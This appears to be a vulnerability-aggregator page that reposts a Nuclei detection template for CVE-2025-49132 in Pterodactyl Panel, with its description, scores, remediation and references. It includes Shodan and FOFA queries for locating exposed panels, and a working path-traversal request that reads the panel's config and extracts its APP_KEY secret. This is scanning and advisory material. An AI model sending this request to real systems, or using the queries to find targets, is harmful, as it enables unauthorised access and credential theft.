CVE-2025-49132: Pterodactyl Panel - Remote Code Execution

日期: 2025-08-01 | 影响软件: Pterodactyl Panel | POC: 已公开

漏洞描述

Pterodactyl is a free, open-source game server management panel. Using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated.

PoC代码[已公开]

id: CVE-2025-49132

info:
  name: Pterodactyl Panel - Remote Code Execution
  severity: critical
  author: darses
  description: |
    Pterodactyl is a free, open-source game server management panel. Using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated.
  impact: |
    With the ability to execute arbitrary code, this vulnerability can be exploited in an infinite number of ways. It could be used to gain access to the Panel's server, read credentials from the Panel's config (.env or otherwise), extract sensitive information from the database (such as user details [username, email, first and last name, hashed password, ip addresses, etc]), access files of servers managed by the panel, etc.
  remediation: |
    Upgrade to Pterodactyl version 1.11.11+. There are no software workarounds for this vulnerability, but use of an external Web Application Firewall (WAF) could help mitigate this attack.
  reference:
    - https://github.com/pterodactyl/panel/security/advisories/GHSA-24wv-6c99-f843
    - https://github.com/pterodactyl/panel/commit/24c82b0e335fb5d7a844226b08abf9f176e592f0
    - https://github.com/pterodactyl/panel/releases/tag/v1.11.11
  classification:
    epss-score: 0.30921
    epss-percentile: 0.96595
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-49132
    cwe-id: CWE-20
  metadata:
    verified: true
    vendor: pterodactyl
    product: panel
    shodan-query:
      - title:"Pterodactyl"
      - http.favicon.hash:-456405319
      - http.favicon.hash:846001371
      - "Set-Cookie: pterodactyl_session="
    fofa-query:
      - title="Pterodactyl"
      - icon_hash="-456405319"
      - icon_hash="846001371"
      - "Set-Cookie: pterodactyl_session="
  tags: pterodactyl, cve, cve2025, rce, lfi,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '{"app":{"version":'
          - '"key":"base64{{'
        condition: and

    extractors:
      - type: json
        name: APP_KEY
        json:
          - ".[] | .app.key"
# digest: 4b0a00483046022100ee3eeec86b107c5613cf202eda052322fa8c134134977947c43fe1f5067f3c96022100e034e0f003f8f99c0458cf00fcfbece9907d9c1d46bc461bc377a2bff1dc4388:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-49132.yaml

相关漏洞推荐